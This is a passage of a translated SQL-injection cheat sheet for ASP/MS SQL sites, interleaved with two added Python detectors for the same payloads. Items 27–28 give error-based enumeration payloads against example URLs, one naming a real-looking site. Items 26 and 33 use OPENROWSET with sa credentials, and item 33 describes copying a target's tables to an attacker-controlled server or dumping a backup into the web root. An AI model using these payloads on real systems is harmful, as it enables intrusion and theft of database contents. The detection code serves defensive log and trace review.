26. Use openrowset() to connect back to the local host for testing: SELECT a.* FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111', 'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a
SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111', 'SELECT * FROM [dvbbs].[dbo].[dv_admin]')
27. Get the host name: http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)-- select convert(int,@@servername) select @@servername
28. Get the database user name: http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)-- http://www.19cn.com/showdetail.asp?id=49 and user>0 select user
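Detection logic for the error-based enumeration in items 27 and 28, written here as an added example that is not part of the original text: it takes constructed web-server request lines (an assumed IIS-style "METHOD URL status" layout), URL-decodes every query parameter, normalises comment-based whitespace and case, and matches the convert(int,@@servername), convert(int,system_user) and "and user>0" signatures. The sample log lines, the signature names and the function names are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures of the error-based enumeration above: a forced int conversion of
# @@servername / system_user so the value leaks through the conversion error,
# or a numeric comparison against user. Signature names are constructed here.
PATTERNS = [
    ("convert_server_name",
     re.compile(r"convert\s*\(\s*int\s*,\s*@@servername\s*\)")),
    ("convert_system_user",
     re.compile(r"convert\s*\(\s*int\s*,\s*(system_user|user_name\s*\(\s*\)|user)\s*\)")),
    ("user_numeric_compare",
     re.compile(r"\b(and|or)\s+user\s*[<>=]+\s*\d+")),
]

# Constructed sample request lines (IIS-style "METHOD URL status"); the
# first is benign, the rest carry the payloads from items 27 and 28 in
# percent-encoded form, the last one with /**/ used in place of spaces.
SAMPLE_LOG = [
    "GET /FullStory.asp?id=1 200",
    "GET /FullStory.asp?id=1%20and%201=convert(int,@@servername)-- 500",
    "GET /showdetail.asp?id=49%20and%20user%3E0 500",
    "GET /FullStory.asp?id=1%20and%201%3Dconvert(int%2Csystem_user)-- 500",
    "GET /FullStory.asp?id=1/**/and/**/1=convert(int,@@servername)-- 500",
]


def normalize(value):
    """Decode a parameter value once more (parse_qsl already decoded once, so
    %25-encoded payloads are caught), strip /**/ comments used as whitespace,
    collapse whitespace and lower-case for case-insensitive matching."""
    decoded = unquote_plus(value)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def scan_request_line(line):
    """Return [(param_name, signature_name), ...] for one request line."""
    hits = []
    parts = line.split()
    if len(parts) < 2:
        return hits
    query = urlsplit(parts[1]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        norm = normalize(value)
        for sig, rx in PATTERNS:
            if rx.search(norm):
                hits.append((name, sig))
    return hits


def scan_log(lines):
    """Return [(line_index, param_name, signature_name), ...] over a log."""
    findings = []
    for i, line in enumerate(lines):
        for param, sig in scan_request_line(line):
            findings.append((i, param, sig))
    return findings


if __name__ == "__main__":
    for idx, param, sig in scan_log(SAMPLE_LOG):
        print(f"line {idx}: parameter '{param}' matches {sig}")
```

Matching on the decoded, comment-stripped value rather than on the raw URL is the design point: the same payload shows up in logs as %20, +, %2520 or /**/ separated, and the convert() error only fires server-side, so the request log is where a defender first sees it.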
32. USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000), @replacechar nchar(1) = N'?', @command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType
when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* Create the select */
/* Use @isobject variable instead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' + REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
33. Backing up a database with DB_OWNER privileges: use openrowset. Connect back to your own database machine: first create a table locally with the same structure as the target table (use nvarchar for the column types). Then use 海洋 (the Ocean tool) to connect to the target's SQL database and run this in its query analyzer: insert into OPENROWSET('sqloledb','server=[your DB server IP];uid=user;pwd=pass;database=dbname;','select * from [table you created]') select * from [target table]-- If the data volume is too large, check whether the database has an auto-numbered column and pull it in ranges: select * from [table name] where id>100. If the database is on the same machine as the web server, just BAK the database straight into the web directory and fetch it from there; the database can't be too big though, over 2 GB and SQL times out. If you have SA privileges, the two ASP programs below can be used to back up the database:
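An added example, not part of the original text, covering the OPENROWSET use in items 26 and 33 from the detection side: given captured T-SQL statement text (as a SQL Server trace, audit or application query log would hold it), it finds OPENROWSET / OPENDATASOURCE calls, extracts the target host from either the bare 'host';'user';'password' form of item 26 or the server=...;uid=...;pwd=... form of item 33, marks the call as a pull (SELECT FROM OPENROWSET) or a push (INSERT INTO OPENROWSET ... SELECT, i.e. data leaving the server), and flags inline credentials. The sample statements, the 198.51.100.7 address, the allowed-host list and all function names are constructed for this example.

```python
import re

# An ad hoc distributed query: OPENROWSET/OPENDATASOURCE, provider literal,
# then the connection literal. Named groups are constructed for this example.
ROWSET_RX = re.compile(
    r"\b(openrowset|opendatasource)\s*\(\s*'(?P<provider>[^']*)'\s*,\s*'(?P<conn>[^']*)'",
    re.IGNORECASE,
)
# "insert into" immediately before the call means data is pushed outward.
PUSH_RX = re.compile(r"insert\s+into\s*$", re.IGNORECASE)
# keyword-form connection strings carry the password inline as pwd=/password=.
CREDS_RX = re.compile(r"\b(pwd|password)\s*=", re.IGNORECASE)

# Constructed sample statements: item 26's loopback test, item 33's push to a
# remote server (documentation address 198.51.100.7), and a benign query.
SAMPLES = [
    "SELECT a.* FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'[password]', "
    "'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a",
    "insert into OPENROWSET('sqloledb','server=198.51.100.7;uid=user;pwd=pass;"
    "database=dbname;','select * from staging_tbl') select * from dv_admin",
    "SELECT name FROM sys.tables",
]


def extract_target(conn):
    """Host from 'server=host;...' / 'data source=host;...', or, for the bare
    'host';'user';'pwd' form, the first quoted literal (all that conn holds)."""
    m = re.search(r"(?:server|data source)\s*=\s*([^;]+)", conn, re.IGNORECASE)
    if m:
        return m.group(1).strip()
    return conn.split(";")[0].strip()


def classify(sql, allowed_hosts=("127.0.0.1", "localhost")):
    """Return one finding dict per distributed-query call in a statement."""
    findings = []
    for m in ROWSET_RX.finditer(sql):
        conn = m.group("conn")
        host = extract_target(conn)
        # bare form: the user and password literals follow the host as ;'..';'..'
        bare_creds = sql[m.end():].lstrip().startswith(";'")
        findings.append({
            "function": m.group(1).lower(),
            "provider": m.group("provider"),
            "host": host,
            "direction": "push" if PUSH_RX.search(sql[:m.start()]) else "pull",
            "credentials_inline": bare_creds or bool(CREDS_RX.search(conn)),
            "verdict": "loopback" if host.lower() in allowed_hosts else "remote",
        })
    return findings


def scan_statements(statements):
    """Return [(statement_index, finding), ...] across captured statements."""
    return [(i, f) for i, sql in enumerate(statements) for f in classify(sql)]


if __name__ == "__main__":
    for idx, f in scan_statements(SAMPLES):
        print(f"statement {idx}: {f['function']} -> {f['host']} "
              f"({f['verdict']}, {f['direction']}, creds={f['credentials_inline']})")
```

The push/pull split matters more than the host alone: item 26 is a loopback read that only proves the feature is enabled, while item 33 is an outbound INSERT that moves a whole table to a server the attacker controls, so a remote push with inline credentials is the combination worth alerting on first. The feature itself is the ad hoc distributed query setting, which is what a hardening review would want turned off where it is not needed.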